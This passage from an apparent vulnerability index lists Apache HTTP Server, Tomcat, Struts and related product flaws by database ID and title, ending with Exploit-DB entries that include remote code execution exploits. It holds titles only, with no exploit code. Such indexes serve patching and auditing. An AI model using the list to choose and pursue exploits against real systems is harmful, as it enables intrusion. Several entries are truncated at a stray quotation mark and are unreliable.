7859| [67515] Apache Tomcat annotations security bypass
7860| [67480] Apache Struts s:submit information disclosure
7861| [67414] Apache APR apr_fnmatch() denial of service
7862| [67356] Apache Struts javatemplates cross-site scripting
7863| [67354] Apache Struts Xwork cross-site scripting
7864| [66676] Apache Tomcat HTTP BIO information disclosure
7865| [66675] Apache Tomcat web.xml security bypass
7866| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
7867| [66241] Apache HttpComponents information disclosure
7868| [66154] Apache Tomcat ServletSecurity security bypass
7869| [65971] Apache Tomcat ServletSecurity security bypass
7870| [65876] Apache Subversion mod_dav_svn denial of service
7871| [65343] Apache Continuum unspecified cross-site scripting
7872| [65162] Apache Tomcat NIO connector denial of service
7873| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
7874| [65160] Apache Tomcat HTML Manager interface cross-site scripting
7875| [65159] Apache Tomcat ServletContect security bypass
7876| [65050] Apache CouchDB web-based administration UI cross-site scripting
7877| [64773] Oracle HTTP Server Apache Plugin unauthorized access
7878| [64473] Apache Subversion blame -g denial of service
7879| [64472] Apache Subversion walk() denial of service
7880| [64407] Apache Axis2 CVE-2010-0219 code execution
7881| [63926] Apache Archiva password privilege escalation
7882| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
7883| [63493] Apache Archiva credentials cross-site request forgery
7884| [63477] Apache Tomcat HttpOnly session hijacking
7885| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
7886| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
7887| [62959] Apache Shiro filters security bypass
7888| [62790] Apache Perl cgi module denial of service
7889| [62576] Apache Qpid exchange denial of service
7890| [62575] Apache Qpid AMQP denial of service
7891| [62354] Apache Qpid SSL denial of service
7892| [62235] Apache APR-util apr_brigade_split_line() denial of service
7893| [62181] Apache XML-RPC SAX Parser information disclosure
7894| [61721] Apache Traffic Server cache poisoning
7895| [61202] Apache Derby BUILTIN authentication functionality information disclosure
7896| [61186] Apache CouchDB Futon cross-site request forgery
7897| [61169] Apache CXF DTD denial of service
7898| [61070] Apache Jackrabbit search.jsp SQL injection
7899| [61006] Apache SLMS Quoting cross-site request forgery
7900| [60962] Apache Tomcat time cross-site scripting
7901| [60883] Apache mod_proxy_http information disclosure
7902| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
7903| [60264] Apache Tomcat Transfer-Encoding denial of service
7904| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
7905| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
7906| [59413] Apache mod_proxy_http timeout information disclosure
7907| [59058] Apache MyFaces unencrypted view state cross-site scripting
7908| [58827] Apache Axis2 xsd file include
7909| [58790] Apache Axis2 modules cross-site scripting
7910| [58299] Apache ActiveMQ queueBrowse cross-site scripting
7911| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
7912| [58056] Apache ActiveMQ .jsp source code disclosure
7913| [58055] Apache Tomcat realm name information disclosure
7914| [58046] Apache HTTP Server mod_auth_shadow security bypass
7915| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
7916| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
7917| [57429] Apache CouchDB algorithms information disclosure
7918| [57398] Apache ActiveMQ Web console cross-site request forgery
7919| [57397] Apache ActiveMQ createDestination.action cross-site scripting
7920| [56653] Apache HTTP Server DNS spoofing
7921| [56652] Apache HTTP Server DNS cross-site scripting
7922| [56625] Apache HTTP Server request header information disclosure
7923| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
7924| [56623] Apache HTTP Server mod_proxy_ajp denial of service
7925| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
7926| [55857] Apache Tomcat WAR files directory traversal
7927| [55856] Apache Tomcat autoDeploy attribute security bypass
7928| [55855] Apache Tomcat WAR directory traversal
7929| [55210] Intuit component for Joomla! Apache information disclosure
7930| [54533] Apache Tomcat 404 error page cross-site scripting
7931| [54182] Apache Tomcat admin default password
7932| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
7933| [53666] Apache HTTP Server Solaris pollset support denial of service
7934| [53650] Apache HTTP Server HTTP basic-auth module security bypass
7935| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
7936| [53041] mod_proxy_ftp module for Apache denial of service
7937| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
7938| [51953] Apache Tomcat Path Disclosure
7939| [51952] Apache Tomcat Path Traversal
7940| [51951] Apache stronghold-status Information Disclosure
7941| [51950] Apache stronghold-info Information Disclosure
7942| [51949] Apache PHP Source Code Disclosure
7943| [51948] Apache Multiviews Attack
7944| [51946] Apache JServ Environment Status Information Disclosure
7945| [51945] Apache error_log Information Disclosure
7946| [51944] Apache Default Installation Page Pattern Found
7947| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
7948| [51942] Apache AXIS XML External Entity File Retrieval
7949| [51941] Apache AXIS Sample Servlet Information Leak
7950| [51940] Apache access_log Information Disclosure
7951| [51626] Apache mod_deflate denial of service
7952| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
7953| [51365] Apache Tomcat RequestDispatcher security bypass
7954| [51273] Apache HTTP Server Incomplete Request denial of service
7955| [51195] Apache Tomcat XML information disclosure
7956| [50994] Apache APR-util xml/apr_xml.c denial of service
7957| [50993] Apache APR-util apr_brigade_vprintf denial of service
7958| [50964] Apache APR-util apr_strmatch_precompile() denial of service
7959| [50930] Apache Tomcat j_security_check information disclosure
7960| [50928] Apache Tomcat AJP denial of service
7961| [50884] Apache HTTP Server XML ENTITY denial of service
7962| [50808] Apache HTTP Server AllowOverride privilege escalation
7963| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
7964| [50059] Apache mod_proxy_ajp information disclosure
7965| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
7966| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
7967| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
7968| [49921] Apache ActiveMQ Web interface cross-site scripting
7969| [49898] Apache Geronimo Services/Repository directory traversal
7970| [49725] Apache Tomcat mod_jk module information disclosure
7971| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
7972| [49712] Apache Struts unspecified cross-site scripting
7973| [49213] Apache Tomcat cal2.jsp cross-site scripting
7974| [48934] Apache Tomcat POST doRead method information disclosure
7975| [48211] Apache Tomcat header HTTP request smuggling
7976| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
7977| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
7978| [47709] Apache Roller "
7979| [47104] Novell Netware ApacheAdmin console security bypass
7980| [47086] Apache HTTP Server OS fingerprinting unspecified
7981| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
7982| [45791] Apache Tomcat RemoteFilterValve security bypass
7983| [44435] Oracle WebLogic Apache Connector buffer overflow
7984| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
7985| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
7986| [44156] Apache Tomcat RequestDispatcher directory traversal
7987| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
7988| [43885] Oracle WebLogic Server Apache Connector buffer overflow
7989| [42987] Apache HTTP Server mod_proxy module denial of service
7990| [42915] Apache Tomcat JSP files path disclosure
7991| [42914] Apache Tomcat MS-DOS path disclosure
7992| [42892] Apache Tomcat unspecified unauthorized access
7993| [42816] Apache Tomcat Host Manager cross-site scripting
7994| [42303] Apache 403 error cross-site scripting
7995| [41618] Apache-SSL ExpandCert() authentication bypass
7996| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
7997| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
7998| [40614] Apache mod_jk2 HTTP Host header buffer overflow
7999| [40562] Apache Geronimo init information disclosure
8000| [40478] Novell Web Manager webadmin-apache.conf security bypass
8001| [40411] Apache Tomcat exception handling information disclosure
8002| [40409] Apache Tomcat native (APR based) connector weak security
8003| [40403] Apache Tomcat quotes and %5C cookie information disclosure
8004| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
8005| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
8006| [39867] Apache HTTP Server mod_negotiation cross-site scripting
8007| [39804] Apache Tomcat SingleSignOn information disclosure
8008| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
8009| [39612] Apache HTTP Server mod_proxy_balancer buffer overflow
8010| [39608] Apache HTTP Server balancer manager cross-site request forgery
8011| [39476] Apache mod_proxy_balancer balancer_handler function denial of service
8012| [39474] Apache HTTP Server mod_proxy_balancer cross-site scripting
8013| [39472] Apache HTTP Server mod_status cross-site scripting
8014| [39201] Apache Tomcat JULI logging weak security
8015| [39158] Apache HTTP Server Windows SMB shares information disclosure
8016| [39001] Apache HTTP Server mod_imap and mod_imagemap module cross-site scripting
8017| [38951] Apache::AuthCAS Perl module cookie SQL injection
8018| [38800] Apache HTTP Server 413 error page cross-site scripting
8019| [38211] Apache Geronimo SQLLoginModule authentication bypass
8020| [37243] Apache Tomcat WebDAV directory traversal
8021| [37178] RHSA update for Apache HTTP Server mod_status module cross-site scripting not installed
8022| [37177] RHSA update for Apache HTTP Server Apache child process denial of service not installed
8023| [37119] RHSA update for Apache mod_auth_kerb off-by-one buffer overflow not installed
8024| [37100] RHSA update for Apache and IBM HTTP Server Expect header cross-site scripting not installed
8025| [36782] Apache Geronimo MEJB unauthorized access
8026| [36586] Apache HTTP Server UTF-7 cross-site scripting
8027| [36468] Apache Geronimo LoginModule security bypass
8028| [36467] Apache Tomcat functions.jsp cross-site scripting
8029| [36402] Apache Tomcat calendar cross-site request forgery
8030| [36354] Apache HTTP Server mod_proxy module denial of service
8031| [36352] Apache HTTP Server ap_proxy_date_canon() denial of service
8032| [36336] Apache Derby lock table privilege escalation
8033| [36335] Apache Derby schema privilege escalation
8034| [36006] Apache Tomcat "
8035| [36001] Apache Tomcat Host Manager Servlet alias cross-site scripting
8036| [35999] Apache Tomcat \"
8037| [35795] Apache Tomcat CookieExample cross-site scripting
8038| [35536] Apache Tomcat SendMailServlet example cross-site scripting
8039| [35384] Apache HTTP Server mod_cache module denial of service
8040| [35097] Apache HTTP Server mod_status module cross-site scripting
8041| [35095] Apache HTTP Server Prefork MPM module denial of service
8042| [34984] Apache HTTP Server recall_headers information disclosure
8043| [34966] Apache HTTP Server MPM content spoofing
8044| [34965] Apache HTTP Server MPM information disclosure
8045| [34963] Apache HTTP Server MPM multiple denial of service
8046| [34872] Apache MyFaces Tomahawk autoscroll parameter cross-site scripting
8047| [34869] Apache Tomcat JSP example Web application cross-site scripting
8048| [34868] Apache Tomcat Manager and Host Manager cross-site scripting
8049| [34496] Apache Tomcat JK Connector security bypass
8050| [34377] Apache Tomcat hello.jsp cross-site scripting
8051| [34212] Apache Tomcat SSL configuration security bypass
8052| [34210] Apache Tomcat Accept-Language cross-site scripting
8053| [34209] Apache Tomcat calendar application cross-site scripting
8054| [34207] Apache Tomcat implicit-objects.jsp cross-site scripting
8055| [34167] Apache Axis WSDL file path disclosure
8056| [34068] Apache Tomcat AJP connector information disclosure
8057| [33584] Apache HTTP Server suEXEC privilege escalation
8058| [32988] Apache Tomcat proxy module directory traversal
8059| [32794] Apache Tomcat JK Web Server Connector map_uri_to_worker() buffer overflow
8060| [32708] Debian Apache tty privilege escalation
8061| [32441] ApacheStats extract() PHP call unspecified
8062| [32128] Apache Tomcat default account
8063| [31680] Apache Tomcat RequestParamExample cross-site scripting
8064| [31649] Apache Tomcat Sample Servlet TroubleShooter detected
8065| [31557] BEA WebLogic Server and WebLogic Express Apache proxy plug-in denial of service
8066| [31236] Apache HTTP Server htpasswd.c strcpy buffer overflow
8067| [30456] Apache mod_auth_kerb off-by-one buffer overflow
8068| [29550] Apache mod_tcl set_var() format string
8069| [28620] Apache and IBM HTTP Server Expect header cross-site scripting
8070| [28357] Apache HTTP Server mod_alias script source information disclosure
8071| [28063] Apache mod_rewrite off-by-one buffer overflow
8072| [27902] Apache Tomcat URL information disclosure
8073| [26786] Apache James SMTP server denial of service
8074| [25680] libapache2 /tmp/svn file upload
8075| [25614] Apache Struts lookupMap cross-site scripting
8076| [25613] Apache Struts ActionForm denial of service
8077| [25612] Apache Struts isCancelled() security bypass
8078| [24965] Apache mod_python FileSession command execution
8079| [24716] Apache James spooler memory leak denial of service
8080| [24159] Apache Geronimo Web-Access-Log Viewer cross-site scripting
8081| [24158] Apache Geronimo jsp-examples cross-site scripting
8082| [24030] Apache auth_ldap module multiple format strings
8083| [24008] Apache mod_ssl custom error message denial of service
8084| [24003] Apache mod_auth_pgsql module multiple syslog format strings
8085| [23612] Apache mod_imap referer field cross-site scripting
8086| [23173] Apache Struts error message cross-site scripting
8087| [22942] Apache Tomcat directory listing denial of service
8088| [22858] Apache Multi-Processing Module code allows denial of service
8089| [22602] RHSA-2005:582 updates for Apache httpd not installed
8090| [22520] Apache mod-auth-shadow "
8091| [22466] ApacheTop symlink
8092| [22109] Apache HTTP Server ssl_engine_kernel client certificate validation
8093| [22006] Apache HTTP Server byte-range filter denial of service
8094| [21567] Apache mod_ssl off-by-one buffer overflow
8095| [21195] Apache HTTP Server header HTTP request smuggling
8096| [20383] Apache HTTP Server htdigest buffer overflow
8097| [19681] Apache Tomcat AJP12 request denial of service
8098| [18993] Apache HTTP server check_forensic symlink attack
8099| [18790] Apache Tomcat Manager cross-site scripting
8100| [18349] Apache HTTP server Apple HFS+ filesystem obtain information
8101| [18348] Apache HTTP server Apple HFS+ filesystem .DS_Store and .ht file disclosure
8102| [18347] Apache HTTP server Apple Mac OS X Server mod_digest_apple module could allow an attacker to replay responses
8103| [17961] Apache Web server ServerTokens has not been set
8104| [17930] Apache HTTP Server HTTP GET request denial of service
8105| [17785] Apache mod_include module buffer overflow
8106| [17671] Apache HTTP Server SSLCipherSuite bypass restrictions
8107| [17473] Apache HTTP Server Satisfy directive allows access to resources
8108| [17413] Apache htpasswd buffer overflow
8109| [17384] Apache HTTP Server environment variable configuration file buffer overflow
8110| [17382] Apache HTTP Server IPv6 apr_util denial of service
8111| [17366] Apache HTTP Server mod_dav module LOCK denial of service
8112| [17273] Apache HTTP Server speculative mode denial of service
8113| [17200] Apache HTTP Server mod_ssl denial of service
8114| [16890] Apache HTTP Server server-info request has been detected
8115| [16889] Apache HTTP Server server-status request has been detected
8116| [16705] Apache mod_ssl format string attack
8117| [16524] Apache HTTP Server ap_get_mime_headers_core denial of service
8118| [16387] Apache HTTP Server mod_proxy Content-Length buffer overflow
8119| [16230] Apache HTTP Server PHP denial of service
8120| [16214] Apache mod_ssl ssl_util_uuencode_binary buffer overflow
8121| [15958] Apache HTTP Server authentication modules memory corruption
8122| [15547] Apache HTTP Server mod_disk_cache local information disclosure
8123| [15540] Apache HTTP Server socket starvation denial of service
8124| [15467] Novell GroupWise WebAccess using Apache Web server allows viewing of files on the server
8125| [15422] Apache HTTP Server mod_access information disclosure
8126| [15419] Apache HTTP Server mod_ssl plain HTTP request denial of service
8127| [15293] Apache for Cygwin "
8128| [15065] Apache-SSL has a default password
8129| [15041] Apache HTTP Server mod_digest module could allow an attacker to replay responses
8130| [15015] Apache httpd server httpd.conf could allow a local user to bypass restrictions
8131| [14751] Apache Mod_python output filter information disclosure
8132| [14125] Apache HTTP Server mod_userdir module information disclosure
8133| [14075] Apache HTTP Server mod_php file descriptor leak
8134| [13703] Apache HTTP Server account
8135| [13689] Apache HTTP Server configuration allows symlinks
8136| [13688] Apache HTTP Server configuration allows SSI
8137| [13687] Apache HTTP Server Server: header value
8138| [13685] Apache HTTP Server ServerTokens value
8139| [13684] Apache HTTP Server ServerSignature value
8140| [13672] Apache HTTP Server config allows directory autoindexing
8141| [13671] Apache HTTP Server default content
8142| [13670] Apache HTTP Server config file directive references outside content root
8143| [13668] Apache HTTP Server httpd not running in chroot environment
8144| [13666] Apache HTTP Server CGI directory contains possible command interpreter or compiler
8145| [13664] Apache HTTP Server config file contains ScriptAlias entry
8146| [13663] Apache HTTP Server CGI support modules loaded
8147| [13661] Apache HTTP Server config file contains AddHandler entry
8148| [13660] Apache HTTP Server 500 error page not CGI script
8149| [13659] Apache HTTP Server 413 error page not CGI script
8150| [13658] Apache HTTP Server 403 error page not CGI script
8151| [13657] Apache HTTP Server 401 error page not CGI script
8152| [13552] Apache HTTP Server mod_cgid module information disclosure
8153| [13550] Apache GET request directory traversal
8154| [13516] Apache Cocoon XMLForm and JXForm could allow execution of code
8155| [13499] Apache Cocoon directory traversal allows downloading of boot.ini file
8156| [13429] Apache Tomcat non-HTTP request denial of service
8157| [13400] Apache HTTP server mod_alias and mod_rewrite buffer overflow
8158| [13295] Apache weak password encryption
8159| [13254] Apache Tomcat .jsp cross-site scripting
8160| [13125] Apache::Gallery Inline::C could allow arbitrary code execution
8161| [13086] Apache Jakarta Tomcat mod_jk format string allows remote access
8162| [12681] Apache HTTP Server mod_proxy could allow mail relaying
8163| [12662] Apache HTTP Server rotatelogs denial of service
8164| [12554] Apache Tomcat stores password in plain text
8165| [12553] Apache HTTP Server redirects and subrequests denial of service
8166| [12552] Apache HTTP Server FTP proxy server denial of service
8167| [12551] Apache HTTP Server prefork MPM denial of service
8168| [12550] Apache HTTP Server weaker than expected encryption
8169| [12549] Apache HTTP Server type-map file denial of service
8170| [12206] Apache Tomcat /opt/tomcat directory insecure permissions
8171| [12102] Apache Jakarta Tomcat MS-DOS device name request denial of service
8172| [12091] Apache HTTP Server apr_password_validate denial of service
8173| [12090] Apache HTTP Server apr_psprintf code execution
8174| [11804] Apache HTTP Server mod_access_referer denial of service
8175| [11750] Apache HTTP Server could leak sensitive file descriptors
8176| [11730] Apache HTTP Server error log and access log terminal escape sequence injection
8177| [11703] Apache long slash path allows directory listing
8178| [11695] Apache HTTP Server LF (Line Feed) denial of service
8179| [11694] Apache HTTP Server filestat.c denial of service
8180| [11438] Apache HTTP Server MIME message boundaries information disclosure
8181| [11412] Apache HTTP Server error log terminal escape sequence injection
8182| [11196] Apache Tomcat examples and ROOT Web applications cross-site scripting
8183| [11195] Apache Tomcat web.xml could be used to read files
8184| [11194] Apache Tomcat URL appended with a null character could list directories
8185| [11139] Apache HTTP Server mass virtual hosting with mod_rewrite or mod_vhost_alias could allow an attacker to obtain files
8186| [11126] Apache HTTP Server illegal character file disclosure
8187| [11125] Apache HTTP Server DOS device name HTTP POST code execution
8188| [11124] Apache HTTP Server DOS device name denial of service
8189| [11088] Apache HTTP Server mod_vhost_alias CGI source disclosure
8190| [10938] Apache HTTP Server printenv test CGI cross-site scripting
8191| [10771] Apache Tomcat mod_jk module multiple HTTP GET request buffer overflow
8192| [10575] Apache mod_php module could allow an attacker to take over the httpd process
8193| [10499] Apache HTTP Server WebDAV HTTP POST view source
8194| [10457] Apache HTTP Server mod_ssl "
8195| [10415] Apache HTTP Server htdigest insecure system() call could allow command execution
8196| [10414] Apache HTTP Server htdigest multiple buffer overflows
8197| [10413] Apache HTTP Server htdigest temporary file race condition
8198| [10412] Apache HTTP Server htpasswd temporary file race condition
8199| [10376] Apache Tomcat invoker servlet used in conjunction with the default servlet reveals source code
8200| [10348] Apache Tomcat HTTP GET request DOS device reference could cause a denial of service
8201| [10281] Apache HTTP Server ab.c ApacheBench long response buffer overflow
8202| [10280] Apache HTTP Server shared memory scorecard overwrite
8203| [10263] Apache Tomcat mod_jk or mod_jserv connector directory disclosure
8204| [10241] Apache HTTP Server Host: header cross-site scripting
8205| [10230] Slapper worm variants A, B, and C target OpenSSL/Apache systems
8206| [10208] Apache HTTP Server mod_dav denial of service
8207| [10206] HP VVOS Apache mod_ssl denial of service
8208| [10200] Apache HTTP Server stderr denial of service
8209| [10175] Apache Tomcat org.apache.catalina.servlets.DefaultServlet reveals source code
8210| [10169] Slapper worm variant (Slapper.C) targets OpenSSL/Apache systems
8211| [10154] Slapper worm variant (Slapper.B) targets OpenSSL/Apache systems
8212| [10098] Slapper worm targets OpenSSL/Apache systems
8213| [9876] Apache HTTP Server cgi/cgid request could disclose the path to a requested script
8214| [9875] Apache HTTP Server .var file request could disclose installation path
8215| [9863] Apache Tomcat web.xml file could allow a remote attacker to bypass restrictions
8216| [9808] Apache HTTP Server non-Unix version URL encoded directory traversal
8217| [9623] Apache HTTP Server ap_log_rerror() path disclosure
8218| [9520] Apache Tomcat /servlet/ mapping cross-site scripting
8219| [9415] Apache HTTP Server mod_ssl .htaccess off-by-one buffer overflow
8220| [9396] Apache Tomcat null character to threads denial of service
8221| [9394] Apache Tomcat HTTP request for LPT9 reveals Web root path
8222| [9249] Apache HTTP Server chunked encoding heap buffer overflow
8223| [9208] Apache Tomcat sample file requests could reveal directory listing and path to Web root directory
8224| [8932] Apache Tomcat example class information disclosure
8225| [8633] Apache HTTP Server with mod_rewrite could allow an attacker to bypass directives
8226| [8629] Apache HTTP Server double-reverse DNS lookup spoofing
8227| [8589] Apache HTTP Server for Windows DOS batch file remote command execution
8228| [8457] Oracle9i Application Server Apache PL/SQL HTTP Location header buffer overflow
8229| [8455] Oracle9i Application Server default installation could allow an attacker to access certain Apache Services
8230| [8400] Apache HTTP Server mod_frontpage buffer overflows
8231| [8326] Apache HTTP Server multiple MIME headers (sioux) denial of service
8232| [8308] Apache "
8233| [8275] Apache HTTP Server with Multiviews enabled could disclose directory contents
8234| [8119] Apache and PHP OPTIONS request reveals "
8235| [8054] Apache is running on the system
8236| [8029] Mandrake Linux default Apache configuration could allow an attacker to browse files and directories
8237| [8027] Mandrake Linux default Apache configuration has remote management interface enabled
8238| [8026] Mandrake Linux Apache sample programs could disclose sensitive information about the server
8239| [7836] Apache HTTP Server log directory denial of service
8240| [7815] Apache for Windows "
8241| [7810] Apache HTTP request could result in unexpected behavior
8242| [7599] Apache Tomcat reveals installation path
8243| [7494] Apache "
8244| [7419] Apache Web Server could allow remote attackers to overwrite .log files
8245| [7363] Apache Web Server hidden HTTP requests
8246| [7249] Apache mod_proxy denial of service
8247| [7129] Linux with Apache Web server could allow an attacker to determine if a specified username exists
8248| [7103] Apple Mac OS X used with Apache Web server could disclose directory contents
8249| [7059] Apache "
8250| [7057] Apache "
8251| [7056] Apache "
8252| [7055] Apache "
8253| [7054] Apache "
8254| [6997] Apache Jakarta Tomcat error message may reveal information
8255| [6971] Apache Jakarta Tomcat may reveal JSP source code with missing HTTP protocol specification
8256| [6970] Apache crafted HTTP request could reveal the internal IP address
8257| [6921] Apache long slash path allows directory listing
8258| [6687] Apple Mac OS X used with Apache Web server could allow arbitrary file disclosure
8259| [6527] Apache Web Server for Windows and OS2 denial of service
8260| [6316] Apache Jakarta Tomcat may reveal JSP source code
8261| [6305] Apache Jakarta Tomcat directory traversal
8262| [5926] Linux Apache symbolic link
8263| [5659] Apache Web server discloses files when used with php script
8264| [5310] Apache mod_rewrite allows attacker to view arbitrary files
8265| [5204] Apache WebDAV directory listings
8266| [5197] Apache Web server reveals CGI script source code
8267| [5160] Apache Jakarta Tomcat default installation
8268| [5099] Trustix Secure Linux installs Apache with world writable access
8269| [4968] Apache Jakarta Tomcat snoop servlet gives out information which could be used in attack
8270| [4967] Apache Jakarta Tomcat 404 error reveals the pathname of the requested file
8271| [4931] Apache source.asp example file allows users to write to files
8272| [4575] IBM HTTP Server running Apache allows users to directory listing and file retrieval
8273| [4205] Apache Jakarta Tomcat delivers file contents
8274| [2084] Apache on Debian by default serves the /usr/doc directory
8275| [1630] MessageMedia UnityMail and Apache Web server MIME header flood denial of service
8276| [697] Apache HTTP server beck exploit
8277| [331] Apache cookies buffer overflow
8278|
8279| Exploit-DB - https://www.exploit-db.com:
8280| [31130] Apache Tomcat <= 6.0.15 Cookie Quote Handling Remote Information Disclosure Vulnerability
8281| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
8282| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
8283| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
8284| [30563] Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability
8285| [30496] Apache Tomcat <= 6.0.13 Cookie Handling Quote Delimiter Session ID Disclosure
8286| [30495] Apache Tomcat <= 6.0.13 Host Manager Servlet Cross Site Scripting Vulnerability
8287| [30191] Apache MyFaces Tomahawk JSF Framework 1.1.5 Autoscroll Parameter Cross Site Scripting Vulnerability
8288| [30189] Apache Tomcat <= 6.0.13 JSP Example Web Applications Cross Site Scripting Vulnerability
8289| [30052] Apache Tomcat 6.0.10 Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
8290| [29930] Apache AXIS 1.0 Non-Existent WSDL Path Information Disclosure Vulnerability
8291| [29859] Apache Roller OGNL Injection
8292| [29739] Apache HTTP Server Tomcat 5.x/6.0.x Directory Traversal Vulnerability
8293| [29435] Apache Tomcat 5.5.25 - CSRF Vulnerabilities
8294| [29316] Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2)
8295| [29290] Apache / PHP 5.x Remote Code Execution Exploit
8296| [28713] Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object RCE
8297| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
8298| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
8299| [28254] Apache Tomcat 5 Information Disclosure Vulnerability
8300| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
8301| [27397] Apache suEXEC Privilege Elevation / Information Disclosure
8302| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
8303| [27096] Apache Geronimo 1.0 Error Page XSS
8304| [27095] Apache Tomcat / Geronimo 1.0 Sample Script cal2.jsp time Parameter XSS
8305| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
8306| [26542] Apache Struts 1.2.7 Error Response Cross-Site Scripting Vulnerability
8307| [25986] Plesk Apache Zeroday Remote Exploit
8308| [25980] Apache Struts includeParams Remote Code Execution
8309| [25625] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (2)
8310| [25624] Apache 1.3.x HTDigest Realm Command Line Argument Buffer Overflow Vulnerability (1)
8311| [24874] Apache Struts ParametersInterceptor Remote Code Execution
8312| [24744] Apache Rave 0.11 - 0.20 - User Information Disclosure
8313| [24694] Apache 1.3.x mod_include Local Buffer Overflow Vulnerability
8314| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
8315| [23751] Apache Cygwin 1.3.x/2.0.x Directory Traversal Vulnerability
8316| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
8317| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
8318| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
8319| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
8320| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
8321| [23245] Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability
8322| [23119] Apache::Gallery 0.4/0.5/0.6 Insecure Local File Storage Privilege Escalation Vulnerability
8323| [22505] Apache Mod_Access_Referer 1.0.2 NULL Pointer Dereference Denial of Service Vulnerability
8324| [22205] Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability
8325| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
8326| [22068] Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability
8327| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
8328| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
8329| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
8330| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
8331| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
8332| [21719] Apache 2.0 Path Disclosure Vulnerability
8333| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
8334| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
8335| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
8336| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
8337| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
8338| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
8339| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
8340| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
8341| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
8342| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
8343| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
8344| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
8345| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
8346| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
8347| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
8348| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
8349| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
8350| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
8351| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
